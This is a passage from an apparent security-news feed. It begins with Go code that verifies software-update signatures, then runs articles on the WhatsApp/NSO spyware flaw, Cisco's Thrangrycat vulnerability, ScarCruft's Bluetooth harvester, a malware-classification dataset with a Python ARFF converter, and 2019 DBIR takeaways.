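// the downloaded bytes verify against the vendor's public key.
func VerifyBinary(pub ed25519.PublicKey, binary []byte, sigHex string) error {
	sig, err := hex.DecodeString(sigHex)
	if err != nil || len(sig) != ed25519.SignatureSize || !ed25519.Verify(pub, binary, sig) {
		return ErrBadSignature
	}
	return nil
}

// ApplyUpdate parses the reply, treats the guid as an integer build number
// (an assumption), validates the link, then fetches and verifies before
// returning the binary. fetch is injected so the example runs offline; nil,nil means no update.
func ApplyUpdate(pub ed25519.PublicKey, installed int, vendorHost string, reply []byte, fetch func(string) ([]byte, error)) ([]byte, error) {
	var info UpdateInfo
	if err := xml.Unmarshal(reply, &info); err != nil {
		return nil, err
	}
	build, err := strconv.Atoi(strings.TrimSpace(info.GUID))
	if err != nil {
		return nil, fmt.Errorf("guid is not a build number: %w", err)
	}
	if build <= installed {
		return nil, nil
	}
	if err := CheckLink(info.Link, vendorHost); err != nil {
		return nil, err
	}
	binary, err := fetch(info.Link)
	if err != nil {
		return nil, err
	}
	if err := VerifyBinary(pub, binary, info.Sig); err != nil {
		return nil, err
	}
	return binary, nil
}

// Scenario runs a constructed exchange (not captured traffic): a signed update
// over https is accepted; an http link is refused; a swapped binary carrying the genuine signature is refused.
func Scenario() (legitOK, httpRefused, tamperRefused bool) {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	const host = "updates.vendor.invalid" // placeholder, not the real update server
	genuine := []byte("constructed genuine update binary")
	sig := hex.EncodeToString(ed25519.Sign(priv, genuine))
	reply := func(scheme string) []byte {
		return []byte(fmt.Sprintf("<update><guid>210</guid><link>%s://%s/u.exe</link><sig>%s</sig></update>", scheme, host, sig))
	}
	fetchGenuine := func(string) ([]byte, error) { return genuine, nil }
	fetchSwapped := func(string) ([]byte, error) { return []byte("swapped in transit"), nil }
	got, err := ApplyUpdate(pub, 205, host, reply("https"), fetchGenuine)
	legitOK = err == nil && string(got) == string(genuine)
	_, err = ApplyUpdate(pub, 205, host, reply("http"), fetchGenuine)
	httpRefused = errors.Is(err, ErrInsecureLink)
	_, err = ApplyUpdate(pub, 205, host, reply("https"), fetchSwapped)
	tamperRefused = errors.Is(err, ErrBadSignature)
	return
}
```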

Pierluigi Paganini

(SecurityAffairs – Plead Backdoor, Zero-day, BlackTech group)

The post BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor appeared first on Security Affairs.

The Latest Techniques Hackers are Using to Compromise Office 365

It was only a few years back that cloud technology was in its infancy and used only by tech-savvy, forward-thinking organisations. Today, it is commonplace. More businesses than ever are making use of cloud services in one form or another. And recent statistics suggest that cloud adoption has reached 88 percent. It seems that businesses now […]

The post The Latest Techniques Hackers are Using to Compromise Office 365 appeared first on The State of Security.

3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, cybercriminals first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that solves for the problem – which means users will fix the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind now and in the future when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up-to-date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important you’re always careful of sharing personal data. Never exchange financial information or crucial personal details over the app, as they can possibly be stolen in the chance your device does become compromised with spyware or other malware.
  • Protect your mobile phones from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

The Guardian view on hacking: a dangerous arms trade | Editorial

Cyberweapons are dangerous in themselves. Their proliferation makes them much more harmful

NSO Group, an Israeli firm that has risen to a billion-dollar valuation on the strength of the aggressive hacking tools it sells to authoritarian governments across the Arab world, is being sued by lawyers and activists who claim to be victims of its software. One of the lawyers involved in the suit was targeted some weeks ago by mysterious WhatsApp calls to his phone in the middle of the night. When he contacted technical experts, they discovered Pegasus 3, an aggressive virus that can apparently install itself on a phone without the victim taking any action at all. Once installed, it takes control of the device, recording conversations and video. It can destroy the evidence of its own arrival and existence, and control any files on the device. In effect, it turns a smartphone into the perfect spying device, which the victim will carry everywhere with them.

Similar programs are widely available to abusers of all sorts, which is one reason why many domestic violence shelters ban the use of smartphones. But the ones that can easily be bought require some action from the victim, usually a misplaced click, or else a few moments’ access to their phone. The NSO malware targeting WhatsApp is different in that it could install itself without the victim doing anything at all. To discover and exploit the programming mistakes that opened this vulnerability would take years and cost millions of dollars. That is why it’s assumed that only states, or state-backed actors, have the resources to produce them.

Continue reading...

Thrangrycat flaw could allow compromising millions of Cisco devices

Security firm Red Balloon discovered a severe vulnerability, dubbed Thrangrycat, in Cisco products that could be exploited to implant a persistent backdoor in many devices.

Experts at Red Balloon Security disclosed two vulnerabilities in Cisco products. The first issue, dubbed Thrangrycat and tracked as CVE-2019-1649, affects multiple Cisco products that support the Trust Anchor module (TAm) and could be exploited by an attacker to fully bypass the TAm via Field Programmable Gate Array (FPGA) bitstream manipulation. The second vulnerability, tracked as CVE-2019-1862, is a remote command injection issue that affects Cisco IOS XE version 16 and could allow remote attackers to execute code as root.

By chaining the flaws an attacker can remotely and persistently bypass Cisco’s secure boot mechanism and lock out all future software updates to the TAm.

“A vulnerability in the logic that handles access control to one of the hardware components in Cisco’s proprietary Secure Boot implementation could allow an authenticated, local attacker to write a modified firmware image to the component.” reads the advisory published by Cisco. “This vulnerability affects multiple Cisco products that support hardware-based Secure Boot functionality.”

The Trust Anchor module (TAm) is a hardware-based component that allows checking that Cisco hardware is authentic and also implements additional security services.

Cisco Secure Boot helps ensure that the code running on Cisco hardware platforms is authentic and unmodified; it has been available in Cisco devices since 2013.

The researchers discovered that an attacker with root privileges can make a persistent modification to the Trust Anchor module via FPGA bitstream modification and load a malicious bootloader.

“An attacker with root privileges on the device can modify the contents of the FPGA anchor bitstream, which is stored unprotected in flash memory.” reads the analysis published by the experts.

“Elements of this bitstream can be modified to disable critical functionality in the TAm. Successful modification of the bitstream is persistent, and the Trust Anchor will be disabled in subsequent boot sequences. It is also possible to lock out any software updates to the TAm’s bitstream.”


Cisco classified the flaw as high severity; it received a CVSS base score of 6.7 because exploitation requires root privileges. However, Red Balloon pointed out that attackers could also exploit the Thrangrycat vulnerability remotely by chaining it with other vulnerabilities that allow them to gain root access or, at least, execute commands as root.

“An attacker with elevated privileges and access to the underlying operating system that is running on the affected device could exploit this vulnerability by writing a modified firmware image to the FPGA.” continues the advisory published by Cisco. “A successful exploit could either cause the device to become unusable (and require a hardware replacement) or allow tampering with the Secure Boot verification process, which under some circumstances may allow the attacker to install and boot a malicious software image. “

Summarizing, the attackers first exploit the RCE vulnerability (CVE-2019-1862) in the web-based user interface of Cisco’s IOS that allows a logged-in administrator to remotely execute arbitrary commands on the underlying Linux shell with root privileges.

Then, once root access is gained, the attacker can remotely bypass the Trust Anchor module (TAm) on the targeted device by triggering the Thrangrycat vulnerability and install a malicious backdoor.

The flaws are very concerning because they reside in the hardware and cannot be addressed with a software patch.

“Since the flaws reside within the hardware design, it is unlikely that any software security patch will fully resolve the fundamental security vulnerability.” concludes the advisory published by Red Balloon.

The experts successfully tested the flaw against Cisco ASR 1001-X routers, but hundreds of millions of Cisco units featuring an FPGA-based TAm implementation are vulnerable.

Red Balloon experts reported the flaws to Cisco in November 2018 and publicly disclosed some details after Cisco released firmware patches to address the vulnerabilities.

The good news is that Cisco is not aware of attacks in the wild exploiting the two vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – Thrangrycat, Cisco)

The post Thrangrycat flaw could allow compromising millions of Cisco devices appeared first on Security Affairs.

North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal

The North Korea-linked APT group ScarCruft (aka APT37 and Group123) continues to expand its arsenal by adding a Bluetooth Harvester.

North Korea-linked APT group ScarCruft (aka APT37, Reaper, and Group123) continues to expand its arsenal by adding a Bluetooth Harvester.

ScarCruft has been active since at least 2012, it made the headlines in early February 2018 when researchers revealed that the APT group leveraged a zero-day vulnerability in Adobe Flash Player to deliver malware to South Korean users.

Kaspersky first documented the operations of the group in 2016. Cyber attacks conducted by the APT37 group mainly targeted government, defense, military, and media organizations in South Korea.

FireEye linked the APT37 group to the North Korean government based on the following clues:

  • the use of a North Korean IP;
  • malware compilation timestamps consistent with a developer operating in the North Korea time zone (UTC +8:30) and following what is believed to be a typical North Korean workday;
  • objectives that align with Pyongyang’s interests (i.e. organizations and individuals involved in Korean Peninsula reunification efforts).

Researchers from FireEye revealed that the nation-state actor also targeted entities in Japan, Vietnam, and even the Middle East in 2017. The hackers targeted organizations in the chemicals, manufacturing, electronics, aerospace, healthcare, and automotive sectors.

Past attacks associated with the ScarCruft APT group involved zero-day vulnerabilities; however, Kaspersky researchers pointed out that the threat actor also used public exploits in its campaigns.

In April 2018, ScarCruft APT added a more advanced variant of an Android Trojan, dubbed KevDroid, to its arsenal.

Now Kaspersky Lab experts discovered that ScarCruft is using a “rare” Bluetooth device harvester.

Kaspersky found several victims of a recent campaign in investment and trading companies in Vietnam and Russia.

“We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea.” reads the analysis published by Kaspersky Lab. “It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.”


“The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration.” continues the analysis.

“We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information.”

The Bluetooth Harvester is delivered by a downloader; it leverages the Windows Bluetooth APIs to collect information on the devices connected via Bluetooth to the compromised system.

The tool gathers several data including device name, address, class, and whether the device is connected, authenticated and remembered.

The dropper used to deliver the Bluetooth Harvester exploits a privilege escalation flaw (CVE-2018-8120) or leverages the UACME method to bypass the Windows User Account Control (UAC) feature. Then the malware executes an installer that creates another downloader, which retrieves a final payload hidden inside an image file.

“The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted.” continues Kaspersky.


The final payload was a backdoor tracked by Cisco as ROKRAT that is used to download and execute other malware, execute commands, and exfiltrate data.

Kaspersky experts also discovered some overlaps with other APT groups, DarkHotel and KONNI. One of the devices infected with ScarCruft malware had previously been compromised by a variant of KONNI and, a few days earlier, by the GreezeBackdoor, a malware belonging to DarkHotel’s arsenal.

“The ScarCruft has shown itself to be a highly-skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe.” concludes Kaspersky. “Based on the ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve.”

Pierluigi Paganini

(SecurityAffairs – ScarCruft, Bluetooth Harvester)

The post North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal appeared first on Security Affairs.

WhatsApp spyware attack was attempt to hack human rights data, says lawyer

NSO Group technology reportedly used against lawyer involved in civil case against the Israeli surveillance firm

The UK lawyer whose phone was targeted by spyware that exploits a WhatsApp vulnerability said it appeared to be a desperate attempt by someone to covertly find out the details of his human rights work.

The lawyer, who asked not to be named, is involved in a civil case brought against the Israeli surveillance company NSO Group whose sophisticated Pegasus malware has reportedly been used against Mexican journalists, and a prominent Saudi dissident living in Canada.

Related: WhatsApp urges users to update app after discovering spyware vulnerability

Users are strongly advised to check for WhatsApp updates manually through the Apple App Store on an iPhone, Google Play or similar on an Android device, the Microsoft Store on Windows Phones and the Galaxy app store on Tizen devices.

Related: Mexico accused of spying on journalists and activists using cellphone malware

Continue reading...

Malware Training Sets: FollowUP

The popular expert Marco Ramilli provided a follow-up to his malware classification activity by adding a scripting section that is useful for several purposes.

In 2016 I was working hard to find a way to classify malware families through artificial intelligence (machine learning). One of the first difficulties I met was finding a classified testing set in order to run new algorithms and to test specific features. So I came up with this blog post and this GitHub repository, where I proposed a new testing set based on a modified version of the Malware Instruction Set for Behavior-Based Analysis, also referred to as MIST. Since that day I have received hundreds of emails from students, researchers and practitioners all around the world asking how to follow up that research and how to contribute to expanding the training set.


I am so glad that many international researchers used my classified malware dataset as a building block for great analyses and for improving the state of the art in malware research. Some of them are listed here, but many other papers, articles and research works have been released (just ask Google).

Today I finally had the chance to follow it up by adding a scripting section which is useful to: (i) generate the modified version of MIST files (the one used in the training sets) and (ii) convert the obtained results to ARFF (Attribute-Relation File Format) from the University of Waikato. The first script named is a reporting module that can be integrated into a running CuckooSandbox environment. It takes the Cuckoo report and converts it into a modified version of a MIST file. To use it, drop it into your running instance of CuckooSandbox V1 (modules/reporting/) and add the specific configuration section to conf/reporting.conf. You may also force its execution without configuration by editing the source code directly. The result is a MIST file for each sample analysed by Cuckoo. The MIST file wraps the generated features as described in the original post here. By using the second script named you can convert your JSON object into ARFF, which is very useful for importing into WEKA to test your favourite algorithms.

Now, if you wish, you are able to generate training sets by yourself and to test new algorithms directly in WEKA. The creation process follows these steps:

  • Upload the samples into a running CuckooSandbox patched with
  • The reporting module produces a MIST.json file for each submitted sample
  • Use a simple script to import your desired MIST.json files into MongoDB. For example: for i in */*.json; do mongoimport --db test --collection test --file "$i"; done
  • Use the second script to generate the ARFF
  • Import the generated ARFF into Weka
  • Start your experimental sessions
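To make the two conversion steps concrete (flattening a Cuckoo-style report into a per-sample behaviour record, then writing a set of labelled records as ARFF for Weka), here is an added example. It is not the reporting module or the converter from the GitHub repository described above: the report layout it reads (behavior.processes[].calls[].api), the bag-of-API-calls feature encoding, the sample records and the labels are all assumptions made for illustration, and the real MIST encoding carries more structure than an API name count.

```python
"""
Added example (not the page's scripts): Cuckoo-style report -> flat record -> ARFF.
Feature layout (one NUMERIC attribute per API name, counted per sample) is an
assumption chosen for illustration, not the MIST encoding used in the original post.
"""
from collections import Counter

# Constructed sample records, standing in for MIST.json files produced by a
# reporting module: a class label plus the API calls observed in the sandbox.
SAMPLE_RECORDS = [
    {"label": "ransomware", "api_calls": ["CryptEncrypt", "WriteFile", "WriteFile", "DeleteFileW"]},
    {"label": "downloader", "api_calls": ["InternetOpenA", "InternetReadFile", "WriteFile", "CreateProcessA"]},
    {"label": "ransomware", "api_calls": ["CryptEncrypt", "WriteFile", "MoveFileW"]},
]

# Constructed fragment shaped like a Cuckoo 1.x report.json (only the keys used here).
SAMPLE_REPORT = {
    "behavior": {"processes": [
        {"process_name": "sample.exe", "calls": [{"api": "CryptEncrypt"}, {"api": "WriteFile"}]},
        {"process_name": "cmd.exe", "calls": [{"api": "CreateProcessA"}]},
    ]}
}


def cuckoo_report_to_record(report, label):
    """Flatten a report into one record: the label plus every API name, in call order.
    Keeping only the API name is a simplification of the page's MIST features."""
    calls = []
    for proc in report.get("behavior", {}).get("processes", []):
        for call in proc.get("calls", []):
            calls.append(call["api"])
    return {"label": label, "api_calls": calls}


def api_vocabulary(records):
    """Sorted set of every API name seen; each one becomes a NUMERIC attribute."""
    return sorted({call for rec in records for call in rec["api_calls"]})


def record_to_row(record, vocab):
    """Bag-of-calls vector: how often each vocabulary API appears in the record."""
    counts = Counter(record["api_calls"])
    return [counts.get(api, 0) for api in vocab]


def arff_escape(name):
    """Attribute names containing spaces, commas, quotes or braces must be quoted in ARFF."""
    if any(c in name for c in " ,'\"{}"):
        return "'" + name.replace("'", "\\'") + "'"
    return name


def records_to_arff(records, relation="mist"):
    """Serialise labelled records as an ARFF document with a nominal 'class' attribute."""
    vocab = api_vocabulary(records)
    labels = sorted({rec["label"] for rec in records})
    lines = ["@RELATION " + relation, ""]
    for api in vocab:
        lines.append("@ATTRIBUTE %s NUMERIC" % arff_escape(api))
    lines.append("@ATTRIBUTE class {%s}" % ",".join(labels))
    lines.extend(["", "@DATA"])
    for rec in records:
        row = record_to_row(rec, vocab)
        lines.append(",".join(str(v) for v in row) + "," + rec["label"])
    return "\n".join(lines) + "\n"


def parse_arff(text):
    """Minimal reader for the ARFF written above (unquoted attribute names only).
    Returns (attribute names, data rows as lists of strings) so output can be checked."""
    attrs, rows, in_data = [], [], False
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("%"):  # skip blanks and ARFF comments
            continue
        if in_data:
            rows.append(line.split(","))
        elif line.upper().startswith("@ATTRIBUTE"):
            attrs.append(line.split()[1])
        elif line.upper() == "@DATA":
            in_data = True
    return attrs, rows


if __name__ == "__main__":
    records = SAMPLE_RECORDS + [cuckoo_report_to_record(SAMPLE_REPORT, "ransomware")]
    print(records_to_arff(records))
```

Every record is scored against one shared vocabulary, so a call that appears in only some samples still gets a column (with a 0) in every row; without that, Weka would reject rows of differing length. The nominal class attribute is listed last because Weka defaults to the last attribute as the class.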

If you want to share your new MIST classified files with the community, please feel free to make pull requests directly on GitHub. Everybody using this set will appreciate it.

The original post, along with many other interesting analyses, is available on the Marco Ramilli blog:

About the author: Marco Ramilli, Founder of Yoroi


I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.


I have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I have also been in charge of testing the uVote voting system for the Italian Minister of Homeland Security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experience by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers, strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – malware, artificial intelligence)

The post Malware Training Sets: FollowUP appeared first on Security Affairs.

WhatsApp urges users to update app after discovering spyware vulnerability

The spyware, developed by an Israeli cyber intelligence company, used infected phone calls to take over the functions of operating systems

WhatsApp is encouraging users to update to the latest version of the app after discovering a vulnerability that allowed spyware to be injected into a user’s phone through the app’s phone call function.

The spyware was developed by the Israeli cyber intelligence company NSO Group, according to the Financial Times, which first reported the vulnerability.


Users are strongly advised to check for WhatsApp updates manually through the Apple App Store on an iPhone, Google Play or similar on an Android device, the Microsoft Store on Windows Phones and the Galaxy app store on Tizen devices.


Global Information Services Company Discloses Malware Attack

A global information services company has disclosed a malware attack that affected several of its applications and platforms. On 6 May, global solutions provider Wolters Kluwer published a statement in which it confirmed that it was suffering network issues: We are experiencing network and service interruptions affecting certain Wolters Kluwer platforms and applications. Out of […]

The post Global Information Services Company Discloses Malware Attack appeared first on The State of Security.

2019 Verizon Data Breach Investigations Report (DBIR) Key Takeaways

The 2019 Verizon Data Breach Investigations Report (DBIR) was released today, and I was lucky enough to be handed a hot off the press physical copy while at the Global Cyber Alliance Cyber Trends 2019 event at Mansion House, London. For me, the DBIR provides the most insightful view on the evolving threat landscape, and is the most valuable annual “state of the nation” report in the security industry.

Global Cyber Alliance Cyber Trends 2019

The DBIR has evolved since its initial release in 2008, when it focused on payment card data breaches and on Verizon’s own breach investigation data. This year’s DBIR involved the analysis of 41,686 security incidents from 66 global data sources in addition to Verizon. The analysed findings are expertly presented over 77 pages, using simple charts supported by astute ‘plain English’ explanations, which is why the DBIR is one of the most quoted reports in presentations and within industry sales collateral.

DBIR 2019 Key Takeaways
      • Financial gain remains the most common motive behind data breaches (71%)
      • 43% of breaches occurred at small businesses
      • A third (32%) of breaches involved phishing
      • The nation-state threat is increasing, with 23% of breaches by nation-state actors
      • More than half (56%) of data breaches took months or longer to discover
      • Ransomware remains a major threat, and is the second most common type of malware reported
      • Business executives are increasingly targeted with social engineering attacks such as phishing and BEC
      • Crypto-mining malware accounts for less than 5% of data breaches; despite the publicity, it didn’t make the top ten malware types listed in the report
      • Espionage is a key motivation behind a quarter of data breaches
      • 60 million records were breached due to misconfigured cloud service buckets
      • Continued reduction in payment card point-of-sale breaches
      • The hacktivist threat remains low; the increase in hacktivist attacks reported in the DBIR 2012 report appears to have been a one-off spike